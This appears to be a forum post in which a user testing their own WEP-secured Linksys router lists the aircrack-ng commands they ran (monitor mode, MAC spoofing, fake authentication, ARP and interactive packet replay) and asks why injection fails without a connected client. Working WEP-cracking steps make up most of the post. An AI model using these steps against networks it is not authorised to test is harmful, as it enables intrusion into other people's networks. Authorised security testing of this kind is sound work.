Iím trying to break a wireless password so that I may show my boss how easy (or not) it is to crack. He wants to set up a wifi spot here at work and I want to make sure all the security bases are covered.

I have a Linksys WRT54G ver. 1.1 wireless router with all settings default with the exception of WEP encryption turned on. MAC address filtering is not enabled. I have a desktop computer with an Asus WL-138GE wireless nic that has a Broadcom chipset. I am running Backtrack 4 pre Final from a live CD and Iím having a problem injecting IVs. These are the commands Iím running:

- This gives me low, eth0, wmaster0 and wlan0. I assume wlan0 is the interface Iím looking for.

airmon-ng stop wlan0
- Interface wlan0 with driver ďb43 Ė [phy0]Ē is reporting monitor mode disabled.

macchanger --mac 00:02:B3:EC:EE:F2 wlan0
- Spoofs the MAC to an Intel corporation. I use this because Iíve read that some routers automatically reject MACs that are not real such as 00:11:22:33:44:55

airmon-ng start wlan0
- This enables monitor mode on mon0 which is my monitoring interface

airodump-ng mon0
- Gives me a list of all access points. My Linksys shows up here.

airodump-ng -c 6 -w linksys.out --bssid xx:xx:xx:xx:xx:xx mon0
- Starts dumping the IVs sent to that access point to linksys.out. xx:xx:xx:xx:xx:xx is of course the access pointís MAC.

At this point I open a new konsole and leave the other one to log.

aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 -e linksys wlan0
- Attempts to authenticate/associate with the router. I get the following message when this is run:
- Sending Authentication Request (Open system) [ACK]
- Authentication successful
- Sending Association Request [ACK]
- Association successful :-) (AID: 1)

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 wlan0
- This command should start injecting IVs and my #Data should be going up in my logging screen but it isnít. This is what I get:
- Read xxxx packets (got 0 ARP requests and 0 ACKs), sent 0 packetsÖ(0 pps)

At this point Iíve read that this command could also work:

Aireplay-ng -2 Ėp 0841 Ėc FF:FF:FF:FF:FF:FF Ėb xx:xx:xx:xx:xx:xx Ėh 00:02:B3:EC:EE:F2 wlan0
- It only says Read xxx packets and my #Data does not increase

If I attach another computer to the access point and start browsing the web my #Data goes up and I can crack the key but I want to break the password without a client attached. I thought maybe injection isnít working so I tried the following:

Aireplay-ng -9 wlan0
- It tells me injection is working and found my Linksys. With the direct probe request it gave me 30/30 100% for my Linksys.

Iíve been searching and reading the replies on this board in an attempt to try to find a solution to this problem but I havenít come across anything thatís helped me. If anyone has any suggestions please post away. Thanks.